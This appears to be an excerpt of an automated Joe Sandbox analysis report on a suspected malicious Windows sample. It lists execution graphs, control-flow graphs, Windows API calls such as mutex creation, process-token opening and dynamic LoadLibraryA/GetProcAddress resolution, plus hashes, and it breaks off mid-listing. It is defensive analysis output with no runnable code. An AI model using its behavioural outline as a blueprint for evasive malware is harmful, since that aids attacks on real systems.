                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621A763B28EC4DEF7198F24EC9439827E0F7A9F04F094526C759A72D2DE65C485C740

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:7.5%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:38
                                                                                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                                                                                          execution_graph 15230 16f4668 15231 16f4684 15230->15231 15232 16f4696 15231->15232 15234 16f47a0 15231->15234 15235 16f47c5 15234->15235 15239 16f48a1 15235->15239 15243 16f48b0 15235->15243 15240 16f48d7 15239->15240 15241 16f49b4 15240->15241 15247 16f4248 15240->15247 15245 16f48d7 15243->15245 15244 16f49b4 15244->15244 15245->15244 15246 16f4248 CreateActCtxA 15245->15246 15246->15244 15248 16f5940 CreateActCtxA 15247->15248 15250 16f5a03 15248->15250 15251 16fad38 15252 16fad47 15251->15252 15255 16fae20 15251->15255 15260 16fae30 15251->15260 15256 16fae41 15255->15256 15257 16fae64 15255->15257 15256->15257 15258 16fb068 GetModuleHandleW 15256->15258 15257->15252 15259 16fb095 15258->15259 15259->15252 15261 16fae64 15260->15261 15262 16fae41 15260->15262 15261->15252 15262->15261 15263 16fb068 GetModuleHandleW 15262->15263 15264 16fb095 15263->15264 15264->15252 15265 16fd0b8 15266 16fd0fe GetCurrentProcess 15265->15266 15268 16fd149 15266->15268 15269 16fd150 GetCurrentThread 15266->15269 15268->15269 15270 16fd18d GetCurrentProcess 15269->15270 15271 16fd186 15269->15271 15272 16fd1c3 15270->15272 15271->15270 15273 16fd1eb GetCurrentThreadId 15272->15273 15274 16fd21c 15273->15274 15275 16fd300 DuplicateHandle 15276 16fd396 15275->15276

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 016FD0A8 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 294 16fd0a8-16fd147 GetCurrentProcess 298 16fd149-16fd14f 294->298 299 16fd150-16fd184 GetCurrentThread 294->299 298->299 300 16fd18d-16fd1c1 GetCurrentProcess 299->300 301 16fd186-16fd18c 299->301 302 16fd1ca-16fd1e5 call 16fd289 300->302 303 16fd1c3-16fd1c9 300->303 301->300 307 16fd1eb-16fd21a GetCurrentThreadId 302->307 303->302 308 16fd21c-16fd222 307->308 309 16fd223-16fd285 307->309 308->309
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD136
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 016FD173
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD1B0
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 016FD209
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                                                                          • Opcode ID: 8ed803cfdb188ccfd20e741af586444800922485824b3ade80be300eb762dea9
                                                                                                                                                                                                                          • Instruction ID: 66c6e99d8ad4668d57927859946c045bf40576f151632611a82a3622af242383
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed803cfdb188ccfd20e741af586444800922485824b3ade80be300eb762dea9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E5147B09006498FDB14DFA9D948BAEBFF1FF48304F20845DE119A73A0D738A984CB65
                                                                                                                                                                                                                          Function 016FD0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 316 16fd0b8-16fd147 GetCurrentProcess 320 16fd149-16fd14f 316->320 321 16fd150-16fd184 GetCurrentThread 316->321 320->321 322 16fd18d-16fd1c1 GetCurrentProcess 321->322 323 16fd186-16fd18c 321->323 324 16fd1ca-16fd1e5 call 16fd289 322->324 325 16fd1c3-16fd1c9 322->325 323->322 329 16fd1eb-16fd21a GetCurrentThreadId 324->329 325->324 330 16fd21c-16fd222 329->330 331 16fd223-16fd285 329->331 330->331
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD136
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 016FD173
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 016FD1B0
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 016FD209
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                                                                                          • Opcode ID: c4d42f36c9b9dc90e50a6be03cd1a7846ebf4c7bce8628950b11e6bf1afaded0
                                                                                                                                                                                                                          • Instruction ID: ba18f1efcc5038fd11711074208ed75ee4899f5d212fc904e9f1032960ff7eca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4d42f36c9b9dc90e50a6be03cd1a7846ebf4c7bce8628950b11e6bf1afaded0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D55138B09002498FDB14DFAAD948BAEBFF5FF48314F20845DE519A7360D7346944CB65
                                                                                                                                                                                                                          Function 016FAE30 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 360 16fae30-16fae3f 361 16fae6b-16fae6f 360->361 362 16fae41-16fae4e call 16f9838 360->362 363 16fae83-16faec4 361->363 364 16fae71-16fae7b 361->364 369 16fae64 362->369 370 16fae50 362->370 371 16faec6-16faece 363->371 372 16faed1-16faedf 363->372 364->363 369->361 417 16fae56 call 16fb0c8 370->417 418 16fae56 call 16fb0b8 370->418 371->372 373 16faf03-16faf05 372->373 374 16faee1-16faee6 372->374 376 16faf08-16faf0f 373->376 378 16faee8-16faeef call 16fa814 374->378 379 16faef1 374->379 375 16fae5c-16fae5e 375->369 377 16fafa0-16fafb7 375->377 380 16faf1c-16faf23 376->380 381 16faf11-16faf19 376->381 393 16fafb9-16fb018 377->393 383 16faef3-16faf01 378->383 379->383 384 16faf25-16faf2d 380->384 385 16faf30-16faf39 call 16fa824 380->385 381->380 383->376 384->385 391 16faf3b-16faf43 385->391 392 16faf46-16faf4b 385->392 391->392 394 16faf4d-16faf54 392->394 395 16faf69-16faf76 392->395 411 16fb01a-16fb060 393->411 394->395 396 16faf56-16faf66 call 16fa834 call 16fa844 394->396 400 16faf99-16faf9f 395->400 401 16faf78-16faf96 395->401 396->395 401->400 412 16fb068-16fb093 GetModuleHandleW 411->412 413 16fb062-16fb065 411->413 414 16fb09c-16fb0b0 412->414 415 16fb095-16fb09b 412->415 413->412 415->414 417->375 418->375
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 016FB086
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          • Opcode ID: 8dbbb030accd429e80d819936e5aeca28c02e912b0795cf205d47a8d2c7f5e75
                                                                                                                                                                                                                          • Instruction ID: e37985518d9edb4caf125acd01f6e05499c191feec1a319526b028e7367abe95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8dbbb030accd429e80d819936e5aeca28c02e912b0795cf205d47a8d2c7f5e75
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D37123B0A00B058FD724DF6AD94075ABBF6FF88300F00892DD69A9BB50DB75E845CB94
                                                                                                                                                                                                                          Function 016F4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 419 16f4248-16f5a01 CreateActCtxA 422 16f5a0a-16f5a64 419->422 423 16f5a03-16f5a09 419->423 430 16f5a66-16f5a69 422->430 431 16f5a73-16f5a77 422->431 423->422 430->431 432 16f5a79-16f5a85 431->432 433 16f5a88 431->433 432->433 435 16f5a89 433->435 435->435
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 016F59F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                          • Opcode ID: 2bd68f1f85b2d348820e3b57b80c02fdc44d8bd3ca02edf881f3fba28f704e67
                                                                                                                                                                                                                          • Instruction ID: 3d6bc1b3b324be3c6b5649c7ae0e4b187b0d410567497059808a3a6b8e34cc44
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bd68f1f85b2d348820e3b57b80c02fdc44d8bd3ca02edf881f3fba28f704e67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41FFB0C00719CBDB24CFA9C884B9EBBF5FF49304F20806AD509AB255DB75694ACF91
                                                                                                                                                                                                                          Function 016F5935 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 436 16f5935-16f5936 437 16f5944-16f5a01 CreateActCtxA 436->437 439 16f5a0a-16f5a64 437->439 440 16f5a03-16f5a09 437->440 447 16f5a66-16f5a69 439->447 448 16f5a73-16f5a77 439->448 440->439 447->448 449 16f5a79-16f5a85 448->449 450 16f5a88 448->450 449->450 452 16f5a89 450->452 452->452
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 016F59F1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                          • Opcode ID: 430a261ab25a49830ea6048fea012d7003f99faf54572aa0b90d8d4af30aa2bc
                                                                                                                                                                                                                          • Instruction ID: 174b2db63bc4962d92ea5d82b0c6f0a368e561f589e11209ae1c316700745a51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 430a261ab25a49830ea6048fea012d7003f99faf54572aa0b90d8d4af30aa2bc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B411FB0C00719CEDB28CFA9C984B9DBBF5FF49304F20806AD409AB254DB75694ACF90
                                                                                                                                                                                                                          Function 016FD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 458 16fd300-16fd394 DuplicateHandle 459 16fd39d-16fd3ba 458->459 460 16fd396-16fd39c 458->460 460->459
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FD387
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: 093bd3ff2c02778b7df171405466f84f3ffaf1a4e6abf0a6beedb5598f99947e
                                                                                                                                                                                                                          • Instruction ID: dd70f660d74a47c097a7363f70bdb38a787c44fe4248c61c6e2ecd2fe4c2899c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 093bd3ff2c02778b7df171405466f84f3ffaf1a4e6abf0a6beedb5598f99947e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F21D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D378A954CFA5
                                                                                                                                                                                                                          Function 016FD2F9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 453 16fd2f9-16fd394 DuplicateHandle 454 16fd39d-16fd3ba 453->454 455 16fd396-16fd39c 453->455 455->454
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FD387
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                          • Opcode ID: 88179357e392f745cf76d2cbf9d94c1a66939584e672b67e198a12f596d5c27f
                                                                                                                                                                                                                          • Instruction ID: fb5d5d760350e87861212ec0b11b6eeb2329b21db22146dcd935bc56dc4c04fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88179357e392f745cf76d2cbf9d94c1a66939584e672b67e198a12f596d5c27f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD21B3B59002499FDB10CFAAD985ADEBBF5FB48310F14841AE918A3350D378A954CFA5
                                                                                                                                                                                                                          Function 016FB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 463 16fb020-16fb060 464 16fb068-16fb093 GetModuleHandleW 463->464 465 16fb062-16fb065 463->465 466 16fb09c-16fb0b0 464->466 467 16fb095-16fb09b 464->467 465->464 467->466
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 016FB086
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448564426.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16f0000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                          • Opcode ID: f35c8671665658d44f95b1965bae63acb72892a7f4f898a9740973f7469fa68b
                                                                                                                                                                                                                          • Instruction ID: 0feedabd3b07398d02eea275d0785e534eeaa393fbf7486be380bd61acab6d57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f35c8671665658d44f95b1965bae63acb72892a7f4f898a9740973f7469fa68b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3110FB5C003498FDB20DF9AC944A9EFBF4AB89210F10841AD928B7210C379A545CFA1
                                                                                                                                                                                                                          Function 0169D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 72ee6585bd175f0ea74d6d4a51b881be4de770e65e10a20c450efba16340c05a
                                                                                                                                                                                                                          • Instruction ID: 58fdf29d6da376098e09c5b977ae90de8a5507b155707398959475c0aa3cf9d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ee6585bd175f0ea74d6d4a51b881be4de770e65e10a20c450efba16340c05a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82210671500204DFDF05DF58D9C0B6ABF69FB98724F20C579D9090B356C33AE456C6A2
                                                                                                                                                                                                                          Function 016AD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448195756.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16ad000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 16b4f6a83049b9653e548815a81fd75059eca60a754dda13b2e5d209e6cc7c1d
                                                                                                                                                                                                                          • Instruction ID: 9c5cda6eb86a0f51a551159e4ba194c1d5e91362212e1b85585ee78049d1e6b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b4f6a83049b9653e548815a81fd75059eca60a754dda13b2e5d209e6cc7c1d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212271684200DFCB15DF68D980B26BFA5FB88314F60C56DD90A4B796C33AD807CA61
                                                                                                                                                                                                                          Function 016AD006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448195756.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_16ad000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: adf8e82e4e700b3482845948e5cad5009745212b2bdf99f82094bc3e8ab05fb1
                                                                                                                                                                                                                          • Instruction ID: 8573f03877d2c14aeeb5942d2a1a4cd9aea4930077101a96a9df6f1c9b0021b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adf8e82e4e700b3482845948e5cad5009745212b2bdf99f82094bc3e8ab05fb1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 852192755483809FDB03CF54D994B11BF71EB46314F28C5DAD8498F6A7C33A984ACB62
                                                                                                                                                                                                                          Function 0169D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                          • Instruction ID: 9c74f316f05845094c8226905a95f94c6ef3da9f089832b51171944dbf899683
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311CD72404240DFDF02CF44D9C4B56BF61FB84624F24C6A9D9090B256C33AE45ACBA2
                                                                                                                                                                                                                          Function 0169DA81 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3992d48275c9f46d99317d3f87e1e962e89dd4741296c3647bf93790ef24c7ec
                                                                                                                                                                                                                          • Instruction ID: 7f9599e43ed5ce1c67d573e8e41c9104e834fe942e36a4d006a18d7f7e229ca8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992d48275c9f46d99317d3f87e1e962e89dd4741296c3647bf93790ef24c7ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201A2311083449BEB218AAECD84B67BF9CEF45330F18C57AED491A286C37D9841CAB5
                                                                                                                                                                                                                          Function 0169DA80 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2448101326.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_169d000_DB9C.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: daa8f13c7175274fc41b2221f2a9d0c297f0e63448747c3a418f082082b42fab
                                                                                                                                                                                                                          • Instruction ID: 904e29bbbe6663ce2645e07725d4955b7dd3cff00fe85235b48d231ddb1f1614
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daa8f13c7175274fc41b2221f2a9d0c297f0e63448747c3a418f082082b42fab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F0AF710083449EEB118A0ACD84B63FFACEB41234F18C56AED480A282C3799840CA70

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:40.2%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                          Total number of Nodes:483
                                                                                                                                                                                                                          Total number of Limit Nodes:12
                                                                                                                                                                                                                          execution_graph 890 7ff7dbd5345c 951 7ff7dbd510a0 890->951 895 7ff7dbd5347c 1185 7ff7dbd54264 GetCurrentProcess OpenProcessToken 895->1185 896 7ff7dbd53474 ExitProcess 900 7ff7dbd53497 901 7ff7dbd534fb 900->901 902 7ff7dbd534ac 900->902 905 7ff7dbd5354c 901->905 906 7ff7dbd53510 901->906 903 7ff7dbd543a4 3 API calls 902->903 904 7ff7dbd534b8 903->904 907 7ff7dbd534bf 904->907 908 7ff7dbd534d2 ExitProcess 904->908 916 7ff7dbd53561 905->916 917 7ff7dbd535a2 905->917 909 7ff7dbd543a4 3 API calls 906->909 910 7ff7dbd543a4 3 API calls 907->910 911 7ff7dbd5351c 909->911 912 7ff7dbd534cb 910->912 913 7ff7dbd5352b 911->913 914 7ff7dbd53523 ExitProcess 911->914 912->908 915 7ff7dbd534da 912->915 918 7ff7dbd5327c 20 API calls 913->918 1220 7ff7dbd532ec 915->1220 1200 7ff7dbd543a4 CreateMutexA 916->1200 1209 7ff7dbd53a74 917->1209 922 7ff7dbd53530 918->922 928 7ff7dbd53537 Sleep 922->928 929 7ff7dbd53544 ExitProcess 922->929 924 7ff7dbd534df 931 7ff7dbd534f3 ExitProcess 924->931 932 7ff7dbd534e6 Sleep 924->932 926 7ff7dbd5357c 1204 7ff7dbd5327c 926->1204 927 7ff7dbd53574 ExitProcess 928->922 932->924 935 7ff7dbd53581 938 7ff7dbd53588 Sleep 935->938 939 7ff7dbd53595 ExitProcess 935->939 936 7ff7dbd5360e 7 API calls 937 7ff7dbd535ba 940 7ff7dbd543a4 3 API calls 937->940 938->935 941 7ff7dbd535c6 940->941 942 7ff7dbd535cd 941->942 943 7ff7dbd535e0 ExitProcess 941->943 944 7ff7dbd543a4 3 API calls 942->944 945 7ff7dbd535d9 944->945 945->943 946 7ff7dbd535e8 945->946 947 7ff7dbd532ec 47 API calls 946->947 948 7ff7dbd535ed 947->948 949 7ff7dbd535f4 Sleep 948->949 950 7ff7dbd53601 ExitProcess 948->950 949->948 1229 7ff7dbd51000 LoadLibraryA GetProcAddress 951->1229 953 7ff7dbd5113a 1230 7ff7dbd51000 LoadLibraryA GetProcAddress 953->1230 955 7ff7dbd51154 1231 7ff7dbd51050 LoadLibraryA GetProcAddress 955->1231 957 7ff7dbd5116e 1232 7ff7dbd51050 LoadLibraryA GetProcAddress 957->1232 959 7ff7dbd51188 1233 7ff7dbd51050 LoadLibraryA GetProcAddress 959->1233 961 7ff7dbd511a2 1234 7ff7dbd51050 LoadLibraryA GetProcAddress 961->1234 963 7ff7dbd511bc 1235 7ff7dbd51050 LoadLibraryA GetProcAddress 963->1235 965 7ff7dbd511d6 1236 7ff7dbd51050 LoadLibraryA GetProcAddress 965->1236 967 7ff7dbd511f0 1237 7ff7dbd51050 LoadLibraryA GetProcAddress 967->1237 969 7ff7dbd5120a 1238 7ff7dbd51050 LoadLibraryA GetProcAddress 969->1238 971 7ff7dbd51224 1239 7ff7dbd51050 LoadLibraryA GetProcAddress 971->1239 973 7ff7dbd5123e 1240 7ff7dbd51000 LoadLibraryA GetProcAddress 973->1240 975 7ff7dbd51258 1241 7ff7dbd51000 LoadLibraryA GetProcAddress 975->1241 977 7ff7dbd51272 1242 7ff7dbd51000 LoadLibraryA GetProcAddress 977->1242 979 7ff7dbd5128c 1243 7ff7dbd51000 LoadLibraryA GetProcAddress 979->1243 981 7ff7dbd512a6 1244 7ff7dbd51050 LoadLibraryA GetProcAddress 981->1244 983 7ff7dbd512c0 1245 7ff7dbd51050 LoadLibraryA GetProcAddress 983->1245 985 7ff7dbd512da 1246 7ff7dbd51050 LoadLibraryA GetProcAddress 985->1246 987 7ff7dbd512f4 1247 7ff7dbd51050 LoadLibraryA GetProcAddress 987->1247 989 7ff7dbd5130e 1248 7ff7dbd51050 LoadLibraryA GetProcAddress 989->1248 991 7ff7dbd51328 1249 7ff7dbd51050 LoadLibraryA GetProcAddress 991->1249 993 7ff7dbd51342 1250 7ff7dbd51050 LoadLibraryA GetProcAddress 993->1250 995 7ff7dbd5135c 1251 7ff7dbd51050 LoadLibraryA GetProcAddress 995->1251 